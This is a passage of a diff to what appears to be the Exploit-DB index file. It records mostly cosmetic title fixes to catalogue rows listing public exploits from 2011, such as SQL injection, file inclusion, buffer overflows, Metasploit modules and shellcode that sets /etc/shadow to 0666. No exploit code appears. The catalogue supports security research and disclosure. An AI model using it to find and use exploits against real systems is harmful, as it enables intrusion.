Tools",php,webapps,0 17055,platforms/php/webapps/17055.txt,"Honey Soft Web Solution Multiple Vulnerabilities",2011-03-28,**RoAd_KiLlEr**,php,webapps,0 -17056,platforms/php/webapps/17056.txt,"Wordpress plugin BackWPup Remote and Local Code Execution Vulnerability",2011-03-28,"Sense of Security",php,webapps,0 +17056,platforms/php/webapps/17056.txt,"Wordpress plugin BackWPup - Remote and Local Code Execution Vulnerability",2011-03-28,"Sense of Security",php,webapps,0 17057,platforms/php/webapps/17057.txt,"webEdition CMS Local File Inclusion Vulnerability",2011-03-28,eidelweiss,php,webapps,0 17058,platforms/linux/remote/17058.rb,"Distributed Ruby Send instance_eval/syscall Code Execution",2011-03-27,metasploit,linux,remote,0 17061,platforms/php/webapps/17061.txt,"Andy's PHP Knowledgebase Project 0.95.4 - SQL Injection",2011-03-29,"AutoSec Tools",php,webapps,0 @@ -14889,7 +14889,7 @@ id,file,description,date,author,platform,type,port 17106,platforms/php/webapps/17106.txt,"Rash CMS SQL Injection Vulnerability",2011-04-03,keracker,php,webapps,0 17107,platforms/php/webapps/17107.txt,"Banner Ad Management Script SQL Injection Vulnerability",2011-04-03,Egyptian.H4x0rz,php,webapps,0 17108,platforms/php/webapps/17108.txt,"OpenCart 1.4.9 - Multiple Local File Inclusion Vulnerabilities",2011-04-03,KedAns-Dz,php,webapps,0 -17432,platforms/sh4/shellcode/17432.c,"Linux/SuperH - sh4 - setuid(0) - chmod(""/etc/shadow""_ 0666) - exit(0) (43 bytes)",2011-06-22,"Jonathan Salwan",sh4,shellcode,0 +17432,platforms/sh4/shellcode/17432.c,"Linux/SuperH - sh4 - setuid(0) - chmod(_/etc/shadow__ 0666) - exit(0) (43 bytes)",2011-06-22,"Jonathan Salwan",sh4,shellcode,0 17431,platforms/php/webapps/17431.txt,"Same Team E-shop manager - SQL Injection Exploit",2011-06-22,"Number 7",php,webapps,0 17110,platforms/php/webapps/17110.txt,"DoceboLms 4.0.4 - Multiple Stored XSS Vulnerabilities",2011-04-04,LiquidWorm,php,webapps,0 17111,platforms/multiple/webapps/17111.txt,"Yaws-Wiki 1.88-1 (Erlang) Stored and Reflective XSS Vulnerabilities",2011-04-04,"Michael Brooks",multiple,webapps,0 @@ -14978,7 +14978,7 @@ id,file,description,date,author,platform,type,port 17211,platforms/php/webapps/17211.txt,"mySeatXT 0.1781 SQL Injection Vulnerability",2011-04-25,"AutoSec Tools",php,webapps,0 17212,platforms/php/webapps/17212.txt,"OrangeHRM 2.6.3 (PluginController.php) Local File Inclusion Vulnerability",2011-04-25,"AutoSec Tools",php,webapps,0 17213,platforms/php/webapps/17213.txt,"phpmychat plus 1.93 - Multiple Vulnerabilities",2011-04-25,"AutoSec Tools",php,webapps,0 -17214,platforms/php/webapps/17214.php,"WordPress SermonBrowser Plugin 0.43 SQL Injection",2011-04-26,Ma3sTr0-Dz,php,webapps,0 +17214,platforms/php/webapps/17214.php,"WordPress SermonBrowser Plugin 0.43 - SQL Injection",2011-04-26,Ma3sTr0-Dz,php,webapps,0 17215,platforms/hardware/webapps/17215.txt,"Snom IP Phone Web Interface < 8 - Multiple Vulnerabilities",2011-04-26,"Yakir Wizman",hardware,webapps,0 17216,platforms/php/webapps/17216.txt,"Quick.CMS 3.0 - CSRF Vulnerabilities",2011-04-26,^Xecuti0N3r,php,webapps,0 17217,platforms/windows/local/17217.py,"Subtitle Processor 7.7.1 SEH Unicode Buffer Overflow Exploit",2011-04-27,"Brandon Murphy",windows,local,0 @@ -15042,13 +15042,13 @@ id,file,description,date,author,platform,type,port 17296,platforms/php/webapps/17296.txt,"NoticeBoardPro 1.0 - Multiple Vulnerabilities",2011-05-16,"AutoSec Tools",php,webapps,0 17297,platforms/php/webapps/17297.txt,"Jcow 4.2.1 - LFI Vulnerability",2011-05-16,"AutoSec Tools",php,webapps,0 17298,platforms/netware/dos/17298.txt,"Novell Netware eDirectory - DoS Vulnerability",2011-05-16,nSense,netware,dos,0 -17299,platforms/php/webapps/17299.txt,"Wordpress Plugin Is-human <= 1.4.2- Remote Command Execution Vulnerability",2011-05-17,neworder,php,webapps,0 +17299,platforms/php/webapps/17299.txt,"Wordpress Plugin Is-human <= 1.4.2 - Remote Command Execution Vulnerability",2011-05-17,neworder,php,webapps,0 17300,platforms/windows/remote/17300.rb,"7-Technologies IGSS <= 9.00.00 b11063 - IGSSdataServer.exe Stack Overflow",2011-05-16,metasploit,windows,remote,0 17302,platforms/windows/local/17302.py,"Sonique 1.96 - (.m3u) Buffer Overflow",2011-05-17,sinfulsecurity,windows,local,0 17301,platforms/php/webapps/17301.txt,"Pligg 1.1.4 - SQL Injection Vulnerability",2011-05-17,Null-0x00,php,webapps,0 17303,platforms/php/webapps/17303.txt,"Joomla 1.0 Component jDownloads - Arbitrary File Upload Vulnerability",2011-05-18,Al-Ghamdi,php,webapps,0 17304,platforms/windows/remote/17304.txt,"Cisco Unified Operations Manager Multiple Vulnerabilities",2011-05-18,"Sense of Security",windows,remote,0 -17305,platforms/windows/dos/17305.py,"Microsoft Windows Vista/Server 2008 - ""nsiproxy.sys"" Local Kernel DoS Exploit",2011-05-18,"Lufeng Li",windows,dos,0 +17305,platforms/windows/dos/17305.py,"Microsoft Windows Vista/Server 2008 - _nsiproxy.sys_ Local Kernel DoS Exploit",2011-05-18,"Lufeng Li",windows,dos,0 17306,platforms/windows/local/17306.pl,"SpongeBob SquarePants Typing Buffer Overflow (SEH)",2011-05-18,"Infant Overflow",windows,local,0 17307,platforms/php/webapps/17307.txt,"Ultimate PHP Board 2.2.7 Broken Authentication and Session Management",2011-05-20,i2sec,php,webapps,0 17308,platforms/php/webapps/17308.txt,"Zen Cart <= 1.3.9h - Multiple Vulnerabilities",2011-05-20,"Dr. Alberto Fontanella",php,webapps,0 @@ -15132,7 +15132,7 @@ id,file,description,date,author,platform,type,port 17405,platforms/windows/dos/17405.txt,"Adobe Reader/Acrobat 10.0.1 DoS Exploit",2011-06-16,"Soroush Dalili",windows,dos,0 17406,platforms/php/webapps/17406.txt,"Catalog Builder - Ecommerce Software - Blind SQL Injection",2011-06-16,takeshix,php,webapps,0 17408,platforms/php/webapps/17408.txt,"WeBid 1.0.2 persistent XSS via SQL Injection",2011-06-17,Saif,php,webapps,0 -17409,platforms/windows/remote/17409.rb,"Internet Explorer - mshtml!CObjectElement Use After Free (MS11-050)",2011-06-17,metasploit,windows,remote,0 +17409,platforms/windows/remote/17409.rb,"Microsoft Internet Explorer - mshtml!CObjectElement Use After Free (MS11-050)",2011-06-17,metasploit,windows,remote,0 17410,platforms/php/webapps/17410.txt,"AiCart 2.0 - Multiple Vulnerabilities",2011-06-18,takeshix,php,webapps,0 17411,platforms/php/webapps/17411.txt,"A Cool Debate 1.0.3 Component Joomla - Local File Inclusion",2011-06-18,"Chip d3 bi0s",php,webapps,0 17412,platforms/php/webapps/17412.txt,"Joomla Component (com_team) SQL Injection Vulnerability",2011-06-19,CoBRa_21,php,webapps,0 @@ -15142,10 +15142,10 @@ id,file,description,date,author,platform,type,port 17416,platforms/windows/remote/17416.html,"Black Ice Fax Voice SDK 12.6 - Remote Code Execution Exploit",2011-06-20,mr_me,windows,remote,0 17417,platforms/windows/remote/17417.rb,"DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow",2011-06-20,metasploit,windows,remote,0 17418,platforms/php/webapps/17418.rb,"If-CMS 2.07 Pre-Auth Local File Inclusion Exploit",2011-06-20,TecR0c,php,webapps,0 -17419,platforms/windows/remote/17419.zip,"Mozilla Firefox - ""nsTreeRange"" Dangling Pointer Exploit",2011-06-20,Abysssec,windows,remote,0 +17419,platforms/windows/remote/17419.zip,"Mozilla Firefox - _nsTreeRange_ Dangling Pointer Exploit",2011-06-20,Abysssec,windows,remote,0 17421,platforms/windows/dos/17421.py,"XnView 1.98 - Denial of Service Vulnerability PoC",2011-06-20,BraniX,windows,dos,0 17422,platforms/hardware/remote/17422.txt,"DreamBox DM800 - Arbitrary File Download Vulnerability",2011-06-21,ShellVision,hardware,remote,0 -17423,platforms/php/webapps/17423.txt,"WPtouch WordPress Plugin 1.9.27 URL redirection",2011-06-21,MaKyOtOx,php,webapps,0 +17423,platforms/php/webapps/17423.txt,"WPtouch WordPress Plugin 1.9.27 - URL redirection",2011-06-21,MaKyOtOx,php,webapps,0 17424,platforms/windows/remote/17424.rb,"Black Ice Cover Page ActiveX Control Arbitrary File Download",2011-06-21,metasploit,windows,remote,0 17426,platforms/php/webapps/17426.txt,"iGiveTest 2.1.0 - SQL Injection Vulnerability",2011-06-21,"Brendan Coles",php,webapps,0 17428,platforms/php/webapps/17428.txt,"Cachelogic Expired Domains Script 1.0 - Multiple Vulnerabilities",2011-06-22,"Brendan Coles",php,webapps,0 @@ -15225,7 +15225,7 @@ id,file,description,date,author,platform,type,port 17517,platforms/windows/remote/17517.txt,"Symantec Backup Exec 12.5 - MiTM Attack",2011-07-09,Nibin,windows,remote,0 17518,platforms/php/webapps/17518.txt,"Tugux CMS 1.2 (pid) Arbitrary File Deletion Vulnerability",2011-07-10,LiquidWorm,php,webapps,0 17519,platforms/windows/remote/17519.py,"Freefloat FTP Server (LIST command) Buffer Overflow Exploit",2011-07-10,"Zer0 Thunder",windows,remote,0 -17520,platforms/windows/remote/17520.rb,"Mozilla Firefox ""nsTreeRange"" Dangling Pointer Vulnerability",2011-07-10,metasploit,windows,remote,0 +17520,platforms/windows/remote/17520.rb,"Mozilla Firefox _nsTreeRange_ Dangling Pointer Vulnerability",2011-07-10,metasploit,windows,remote,0 17522,platforms/php/webapps/17522.txt,"Fire Soft Board <= 2.0.1 Persistent XSS Vulnerability (admin panel)",2011-07-12,"_jill for A-S",php,webapps,0 17523,platforms/php/webapps/17523.txt,"Tradingeye E-commerce Shopping Cart Multiple Vulnerabilities",2011-07-12,"$#4d0\/\/[r007k17]",php,webapps,0 17524,platforms/php/webapps/17524.html,"Pandora Fms 3.2.1 - Cross-Site Request Forgery",2011-07-12,"mehdi boukazoula",php,webapps,0 @@ -15372,7 +15372,7 @@ id,file,description,date,author,platform,type,port 17698,platforms/php/webapps/17698.rb,"Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability",2011-08-19,metasploit,php,webapps,0 17699,platforms/windows/remote/17699.rb,"Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution",2011-08-19,metasploit,windows,remote,0 17700,platforms/windows/remote/17700.rb,"Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution",2011-08-19,metasploit,windows,remote,0 -17702,platforms/php/webapps/17702.rb,"WordPress Block-Spam-By-Math-Reloaded Plugin Bypass",2011-08-20,"Tiago Ferreira and Heyder Andrade",php,webapps,0 +17702,platforms/php/webapps/17702.rb,"WordPress Block-Spam-By-Math-Reloaded Plugin - Bypass",2011-08-20,"Tiago Ferreira and Heyder Andrade",php,webapps,0 17703,platforms/php/webapps/17703.txt,"Axis Commerce (E-Commerce System) Stored XSS",2011-08-20,"Eyup CELIK",php,webapps,0 17704,platforms/php/webapps/17704.txt,"WordPress UnGallery plugin <= 1.5.8 - Local File Disclosure Vulnerability",2011-08-20,"Miroslav Stampar",php,webapps,0 17705,platforms/php/webapps/17705.txt,"EasySiteEdit Remote File Inclusion Vulnerability",2011-08-21,"koskesh jakesh",php,webapps,0 @@ -15406,7 +15406,7 @@ id,file,description,date,author,platform,type,port 17736,platforms/php/webapps/17736.txt,"joomla simple file lister module <= 1.0 - Directory Traversal Vulnerability",2011-08-28,evilsocket,php,webapps,0 17737,platforms/php/webapps/17737.txt,"WordPress Facebook Promotions plugin <= 1.3.3 - SQL Injection Vulnerability",2011-08-28,"Miroslav Stampar",php,webapps,0 17738,platforms/php/webapps/17738.txt,"WordPress Evarisk plugin <= 5.1.3.6 - SQL Injection Vulnerability",2011-08-28,"Miroslav Stampar",php,webapps,0 -17739,platforms/php/webapps/17739.txt,"WordPress Profiles plugin <= 2.0 RC1 SQL Injection Vulnerability",2011-08-28,"Miroslav Stampar",php,webapps,0 +17739,platforms/php/webapps/17739.txt,"WordPress Profiles plugin <= 2.0 RC1 - SQL Injection Vulnerability",2011-08-28,"Miroslav Stampar",php,webapps,0 17740,platforms/php/webapps/17740.txt,"WordPress mySTAT plugin <= 2.6 - SQL Injection Vulnerability",2011-08-28,"Miroslav Stampar",php,webapps,0 17741,platforms/php/webapps/17741.txt,"Omnistar Mailer Multiple Vulnerabilities",2011-08-28,Sid3^effects,php,webapps,0 17742,platforms/windows/dos/17742.py,"Mini FTP Server 1.1 - Buffer Corruption Remote Denial of Service",2011-08-28,LiquidWorm,windows,dos,0 @@ -15457,10 +15457,10 @@ id,file,description,date,author,platform,type,port 17794,platforms/php/webapps/17794.txt,"WordPress Eventify - Simple Events plugin <= 1.7.f SQL Injection Vulnerability",2011-09-07,"Miroslav Stampar",php,webapps,0 17795,platforms/windows/dos/17795.py,"Crush FTP 5 - 'APPE' command Remote JVM BSOD PoC Exploit",2011-09-07,"BSOD Digital",windows,dos,0 17796,platforms/windows/dos/17796.txt,"Windows Server 2008 R1 - Local Denial of Service",2011-09-07,Randomdude,windows,dos,0 -17797,platforms/php/webapps/17797.txt,"WordPress Paid Downloads plugin <= 2.01 SQL Injection Vulnerability",2011-09-08,"Miroslav Stampar",php,webapps,0 +17797,platforms/php/webapps/17797.txt,"WordPress Paid Downloads plugin <= 2.01 - SQL Injection Vulnerability",2011-09-08,"Miroslav Stampar",php,webapps,0 17798,platforms/php/webapps/17798.txt,"WordPress Community Events plugin <= 1.2.1 - SQL Injection Vulnerability",2011-09-08,"Miroslav Stampar",php,webapps,0 17800,platforms/php/webapps/17800.txt,"AM4SS 1.2 - CSRF add admin Vulnerability",2011-09-08,"red virus",php,webapps,0 -17801,platforms/php/webapps/17801.rb,"Wordpress 1 Flash Gallery Plugin Arbiraty File Upload Exploit (MSF)",2011-09-08,"Ben Schmidt",php,webapps,0 +17801,platforms/php/webapps/17801.rb,"Wordpress 1 Flash Gallery Plugin - Arbiraty File Upload Exploit (MSF)",2011-09-08,"Ben Schmidt",php,webapps,0 17803,platforms/windows/local/17803.php,"DVD X Player 5.5 Pro (SEH DEP + ASLR Bypass) Exploit",2011-09-08,Rew,windows,local,0 21788,platforms/windows/dos/21788.pl,"FastStone Image Viewer 4.6 - ReadAVonIP Crash PoC",2012-10-07,"Jean Pascal Pereira",windows,dos,0 21787,platforms/php/webapps/21787.rb,"MyAuth3 - Blind SQL Injection",2012-10-07,"Marcio Almeida",php,webapps,0 @@ -15471,9 +15471,9 @@ id,file,description,date,author,platform,type,port 17810,platforms/windows/remote/17810.rb,"BisonFTP Server <= 3.5 - Remote Buffer Overflow Exploit (MSF)",2011-09-09,"SecPod Research",windows,remote,0 17811,platforms/php/webapps/17811.txt,"MYRE Real Estate Software Multiple Vulnerabilities",2011-09-09,"SecPod Research",php,webapps,0 17813,platforms/php/webapps/17813.txt,"Xataface WebAuction and Xataface Librarian DB - Multiple Vulnerabilities",2011-09-09,"SecPod Research",php,webapps,0 -17814,platforms/php/webapps/17814.txt,"Wordpress Event Registration plugin <= 5.44 SQL Injection Vulnerability",2011-09-09,serk,php,webapps,0 +17814,platforms/php/webapps/17814.txt,"Wordpress Event Registration plugin <= 5.44 - SQL Injection Vulnerability",2011-09-09,serk,php,webapps,0 17815,platforms/windows/dos/17815.py,"MelOn Player 1.0.11.x - Denial of Service PoC",2011-09-09,modpr0be,windows,dos,0 -17816,platforms/php/webapps/17816.txt,"WordPress Tune Library plugin <= 2.17 SQL Injection Vulnerability",2011-09-10,"Miroslav Stampar",php,webapps,0 +17816,platforms/php/webapps/17816.txt,"WordPress Tune Library plugin <= 2.17 - SQL Injection Vulnerability",2011-09-10,"Miroslav Stampar",php,webapps,0 17817,platforms/windows/local/17817.php,"ScadaTEC ModbusTagServer & ScadaPhone (.zip) Buffer Overflow Exploit (0day)",2011-09-12,mr_me,windows,local,0 17818,platforms/php/webapps/17818.txt,"TomatoCart 1.1 Post Auth Local File Inclusion Vulnerability",2011-09-12,brain[pillow],php,webapps,0 17819,platforms/windows/remote/17819.py,"KnFTP Server Buffer Overflow Exploit",2011-09-12,blake,windows,remote,0 @@ -15508,9 +15508,9 @@ id,file,description,date,author,platform,type,port 17850,platforms/php/webapps/17850.txt,"iBrowser Plugin 1.4.1 (lang) - Local File Inclusion Vulnerability",2011-09-17,LiquidWorm,php,webapps,0 17851,platforms/php/webapps/17851.txt,"iManager Plugin 1.2.8 (lang) - Local File Inclusion Vulnerability",2011-09-17,LiquidWorm,php,webapps,0 17852,platforms/php/webapps/17852.txt,"iManager Plugin 1.2.8 (d) - Remote Arbitrary File Deletion Vulnerability",2011-09-17,LiquidWorm,php,webapps,0 -17858,platforms/php/webapps/17858.txt,"WordPress Filedownload Plugin 0.1 (download.php) Remote File Disclosure Vulnerability",2011-09-19,Septemb0x,php,webapps,0 +17858,platforms/php/webapps/17858.txt,"WordPress Filedownload Plugin 0.1 - (download.php) Remote File Disclosure Vulnerability",2011-09-19,Septemb0x,php,webapps,0 17859,platforms/php/webapps/17859.txt,"Toko Lite CMS 1.5.2 (edit.php) HTTP Response Splitting Vulnerability",2011-09-19,LiquidWorm,php,webapps,0 -17857,platforms/php/webapps/17857.txt,"WordPress Count per Day plugin <= 2.17 SQL Injection Vulnerability",2011-09-18,"Miroslav Stampar",php,webapps,0 +17857,platforms/php/webapps/17857.txt,"WordPress Count per Day plugin <= 2.17 - SQL Injection Vulnerability",2011-09-18,"Miroslav Stampar",php,webapps,0 17854,platforms/windows/local/17854.py,"MY MP3 Player 3.0 m3u Exploit DEP Bypass",2011-09-17,blake,windows,local,0 17855,platforms/windows/remote/17855.rb,"DaqFactory HMI NETB Request Overflow",2011-09-18,metasploit,windows,remote,0 17856,platforms/windows/dos/17856.py,"KnFTP 1.0.0 Server Multiple Buffer Overflow Exploit (DoS PoC)",2011-09-18,loneferret,windows,dos,21 @@ -15526,7 +15526,7 @@ id,file,description,date,author,platform,type,port 17869,platforms/php/webapps/17869.txt,"Wordpress Relocate Upload Plugin 0.14 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 17870,platforms/windows/remote/17870.pl,"KnFTP 1.0.0 Server - 'USER' command Remote Buffer Overflow Exploit",2011-09-19,mr.pr0n,windows,remote,0 17871,platforms/hardware/webapps/17871.txt,"Cisco TelePresence Multiple Vulnerabilities - SOS-11-010",2011-09-19,"Sense of Security",hardware,webapps,0 -17872,platforms/php/webapps/17872.txt,"Multiple Wordpress Plugin timthumb.php Vulnerabilites",2011-09-19,"Ben Schmidt",php,webapps,0 +17872,platforms/php/webapps/17872.txt,"Multiple Wordpress Plugin - timthumb.php Vulnerabilites",2011-09-19,"Ben Schmidt",php,webapps,0 17873,platforms/windows/webapps/17873.txt,"SharePoint 2007/2010 and DotNetNuke < 6 - File disclosure via XEE",2011-09-20,"Nicolas Gregoire",windows,webapps,0 17874,platforms/hardware/webapps/17874.txt,"NETGEAR Wireless Cable Modem Gateway Auth Bypass and CSRF",2011-09-20,"Sense of Security",hardware,webapps,0 17876,platforms/windows/remote/17876.py,"ScriptFTP <= 3.3 - Remote Buffer Overflow (LIST)",2011-09-20,modpr0be,windows,remote,0 @@ -15546,7 +15546,7 @@ id,file,description,date,author,platform,type,port 17891,platforms/php/webapps/17891.txt,"WordPress CevherShare Plugin 2.0 - SQL Injection",2011-09-26,bd0rk,php,webapps,0 17892,platforms/windows/local/17892.pl,"Muse Music All-In-One 1.5.0.001 - (.pls) Buffer Overflow (DEP Bypass)",2011-09-26,"C4SS!0 G0M3S",windows,local,0 17893,platforms/windows/local/17893.pl,"GTA SA-MP server.cfg - Local Buffer Overflow Vulnerability",2011-09-26,Silent_Dream,windows,local,0 -17894,platforms/php/webapps/17894.txt,"WordPress Mingle Forum plugin <= 1.0.31 SQL Injection Vulnerability",2011-09-27,"Miroslav Stampar",php,webapps,0 +17894,platforms/php/webapps/17894.txt,"WordPress Mingle Forum plugin <= 1.0.31 - SQL Injection Vulnerability",2011-09-27,"Miroslav Stampar",php,webapps,0 17895,platforms/php/webapps/17895.txt,"Jarida 1.0 - Multiple Vulnerabilities",2011-09-27,"Ptrace Security",php,webapps,0 17896,platforms/windows/dos/17896.txt,"PcVue <= 10.0 - Multiple Vulnerabilities",2011-09-27,"Luigi Auriemma",windows,dos,0 17897,platforms/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerability",2011-09-27,"Sohil Garg",jsp,webapps,0 @@ -15575,7 +15575,7 @@ id,file,description,date,author,platform,type,port 17930,platforms/windows/dos/17930.txt,"Cytel Studio <= 9.0.0 - Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",windows,dos,0 17931,platforms/windows/dos/17931.txt,"genstat <= 14.1.0.5943 - Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",windows,dos,0 17932,platforms/linux/local/17932.c,"PolicyKit polkit-1 <= 0.101- Linux - Local Privilege Escalation",2011-10-05,zx2c4,linux,local,0 -17933,platforms/windows/dos/17933.html,"DivX Plus Web Player ""file://"" Buffer Overflow Vulnerability PoC",2011-10-05,Snake,windows,dos,0 +17933,platforms/windows/dos/17933.html,"DivX Plus Web Player _file://_ Buffer Overflow Vulnerability PoC",2011-10-05,Snake,windows,dos,0 18033,platforms/php/webapps/18033.txt,"Joomla YJ Contact us Component Local File Inclusion Vulnerability",2011-10-25,MeGo,php,webapps,0 17935,platforms/php/webapps/17935.txt,"tsmim Lessons Library (show.php) SQL Injection",2011-10-06,M.Jock3R,php,webapps,0 17936,platforms/windows/remote/17936.rb,"Opera 10/11 (bad nesting with frameset tag) Memory Corruption",2011-10-06,"Jose A. Vazquez",windows,remote,0 @@ -15594,9 +15594,9 @@ id,file,description,date,author,platform,type,port 17950,platforms/php/webapps/17950.txt,"GotoCode Online Classifieds Multiple Vulnerabilities",2011-10-09,"Nathaniel Carew",php,webapps,0 17951,platforms/php/webapps/17951.txt,"openEngine 2.0 - Multiple Blind SQL Injection vulnerabilities",2011-10-10,"Stefan Schurtz",php,webapps,0 17952,platforms/php/webapps/17952.txt,"KaiBB 2.0.1 - SQL Injection Vulnerability",2011-10-10,"Stefan Schurtz",php,webapps,0 -17970,platforms/php/webapps/17970.txt,"WP-SpamFree WordPress Spam Plugin SQL Injection Vulnerability",2011-10-11,cheki,php,webapps,0 +17970,platforms/php/webapps/17970.txt,"WP-SpamFree WordPress Spam Plugin - SQL Injection Vulnerability",2011-10-11,cheki,php,webapps,0 17972,platforms/php/webapps/17972.txt,"MyBB MyStatus 3.1 - SQL Injection Vulnerability",2011-10-12,Mario_Vs,php,webapps,0 -17973,platforms/php/webapps/17973.txt,"WordPress GD Star Rating plugin <= 1.9.10 SQL Injection",2011-10-12,"Miroslav Stampar",php,webapps,0 +17973,platforms/php/webapps/17973.txt,"WordPress GD Star Rating plugin <= 1.9.10 - SQL Injection",2011-10-12,"Miroslav Stampar",php,webapps,0 17969,platforms/multiple/remote/17969.py,"Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC",2011-10-11,"Rodrigo Marcos",multiple,remote,0 17955,platforms/php/webapps/17955.txt,"Filmis 0.2 Beta - Multiple Vulnerabilities",2011-10-10,M.Jock3R,php,webapps,0 17956,platforms/php/webapps/17956.txt,"6kbbs Multiple Vulnerabilities",2011-10-10,"labs insight",php,webapps,0 @@ -15623,7 +15623,7 @@ id,file,description,date,author,platform,type,port 17985,platforms/windows/local/17985.rb,"Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow",2011-10-16,metasploit,windows,local,0 17984,platforms/php/webapps/17984.txt,"Ruubikcms 1.1.0 - (/extra/image.php) Local File Inclusion",2011-10-16,"Sangyun YOO",php,webapps,0 17986,platforms/osx/remote/17986.rb,"Apple Safari file:// Arbitrary Code Execution",2011-10-17,metasploit,osx,remote,0 -17987,platforms/php/webapps/17987.txt,"WordPress BackWPUp Plugin 2.1.4 Code Execution",2011-10-17,"Sense of Security",php,webapps,0 +17987,platforms/php/webapps/17987.txt,"WordPress BackWPUp Plugin 2.1.4 - Code Execution",2011-10-17,"Sense of Security",php,webapps,0 17993,platforms/windows/remote/17993.rb,"Apple Safari Webkit libxslt Arbitrary File Creation",2011-10-18,metasploit,windows,remote,0 17994,platforms/php/webapps/17994.php,"Dolphin <= 7.0.7 (member_menu_queries.php) Remote PHP Code Injection",2011-10-18,EgiX,php,webapps,0 17989,platforms/php/webapps/17989.txt,"Dominant Creature BBG/RPG Browser Game Persistent XSS",2011-10-17,M.Jock3R,php,webapps,0 @@ -15664,7 +15664,7 @@ id,file,description,date,author,platform,type,port 18046,platforms/php/webapps/18046.txt,"Barter Sites 1.3 Joomla Component Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 18040,platforms/linux/local/18040.c,"Xorg 1.4 < 1.11.2 - File Permission Change PoC",2011-10-28,vladz,linux,local,0 18027,platforms/windows/local/18027.rb,"Cytel Studio 9.0 (CY3 File) Stack Buffer Overflow",2011-10-24,metasploit,windows,local,0 -18028,platforms/windows/dos/18028.py,"zFTP Server ""cwd/stat"" Remote Denial-of-Service",2011-10-24,"Myo Soe",windows,dos,0 +18028,platforms/windows/dos/18028.py,"zFTP Server _cwd/stat_ Remote Denial-of-Service",2011-10-24,"Myo Soe",windows,dos,0 18029,platforms/windows/dos/18029.pl,"BlueZone Malformed .zft file Local Denial of Service",2011-10-24,"Iolo Morganwg",windows,dos,0 18030,platforms/windows/dos/18030.pl,"BlueZone Desktop Multiple Malformed files Local Denial of Service Vulnerabilities",2011-10-25,Silent_Dream,windows,dos,0 18031,platforms/php/webapps/18031.rb,"phpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection",2011-10-25,metasploit,php,webapps,0 @@ -15673,7 +15673,7 @@ id,file,description,date,author,platform,type,port 18036,platforms/php/webapps/18036.txt,"eFront <= 3.6.10 (build 11944) Multiple Security Vulnerabilities",2011-10-27,EgiX,php,webapps,0 18037,platforms/php/webapps/18037.rb,"phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection",2011-10-26,metasploit,php,webapps,0 18038,platforms/windows/local/18038.rb,"GTA SA-MP server.cfg - Buffer Overflow",2011-10-26,metasploit,windows,local,0 -18039,platforms/php/webapps/18039.txt,"WordPress wptouch plugin SQL Injection Vulnerability",2011-10-27,longrifle0x,php,webapps,0 +18039,platforms/php/webapps/18039.txt,"WordPress wptouch plugin - SQL Injection Vulnerability",2011-10-27,longrifle0x,php,webapps,0 18045,platforms/php/webapps/18045.txt,"PHP Photo Album <= 0.4.1.16 - Multiple Disclosure Vulnerabilities",2011-10-29,"BHG Security Center",php,webapps,0 18047,platforms/php/webapps/18047.txt,"JEEMA Sms 3.2 Joomla Component Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 18048,platforms/php/webapps/18048.txt,"Vik Real Estate 1.0 Joomla Component Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 @@ -15718,7 +15718,7 @@ id,file,description,date,author,platform,type,port 18093,platforms/windows/remote/18093.txt,"Oracle XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA Procedure Exploit",2011-11-07,"David Maman",windows,remote,0 18095,platforms/php/webapps/18095.txt,"11in1 CMS 1.0.1 (do.php) - CRLF Injection Vulnerability",2011-11-08,LiquidWorm,php,webapps,0 18096,platforms/windows/local/18096.py,"Aviosoft Digital TV Player Professional 1.x - Stack Buffer Overflow",2011-11-09,modpr0be,windows,local,0 -18099,platforms/php/webapps/18099.txt,"osCSS2 - ""_ID"" parameter Local file inclusion",2011-11-09,"Stefan Schurtz",php,webapps,0 +18099,platforms/php/webapps/18099.txt,"osCSS2 - __ID_ parameter Local file inclusion",2011-11-09,"Stefan Schurtz",php,webapps,0 18100,platforms/php/webapps/18100.txt,"labwiki <= 1.1 - Multiple Vulnerabilities",2011-11-09,muuratsalo,php,webapps,0 18101,platforms/hardware/webapps/18101.pl,"Comtrend Router CT-5624 - Remote Root/Support Password Disclosure/Change Exploit",2011-11-09,"Todor Donev",hardware,webapps,0 18102,platforms/windows/remote/18102.rb,"AbsoluteFTP 1.9.6 - 2.2.10 - Remote Buffer Overflow (LIST)",2011-11-09,Node,windows,remote,0 @@ -15730,7 +15730,7 @@ id,file,description,date,author,platform,type,port 18110,platforms/php/webapps/18110.txt,"CMS 4.x.x Zorder (SQL Injection Vul)",2011-11-13,"KraL BeNiM",php,webapps,0 18119,platforms/windows/dos/18119.rb,"Attachmate Reflection FTP Client Heap Overflow",2011-11-16,"Francis Provencher",windows,dos,0 18120,platforms/linux/dos/18120.py,"FleaHttpd Remote Denial of Service Exploit",2011-11-16,condis,linux,dos,80 -18111,platforms/php/webapps/18111.php,"Wordpress Zingiri Plugin <= 2.2.3 (ajax_save_name.php) Remote Code Execution",2011-11-13,EgiX,php,webapps,0 +18111,platforms/php/webapps/18111.php,"Wordpress Zingiri Plugin <= 2.2.3 - (ajax_save_name.php) Remote Code Execution",2011-11-13,EgiX,php,webapps,0 18132,platforms/php/webapps/18132.php,"Support Incident Tracker <= 3.65 (translate.php) Remote Code Execution",2011-11-19,EgiX,php,webapps,0 18112,platforms/windows/dos/18112.txt,"optima apiftp server <= 1.5.2.13 - Multiple Vulnerabilities",2011-11-14,"Luigi Auriemma",windows,dos,0 18113,platforms/windows/local/18113.rb,"Mini-Stream RM-MP3 Converter 3.1.2.1 - (.pls) Stack Buffer Overflow",2011-11-14,metasploit,windows,local,0 @@ -15761,7 +15761,7 @@ id,file,description,date,author,platform,type,port 18149,platforms/php/webapps/18149.php,"PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit",2011-11-23,EgiX,php,webapps,0 18151,platforms/php/webapps/18151.php,"Log1CMS 2.0 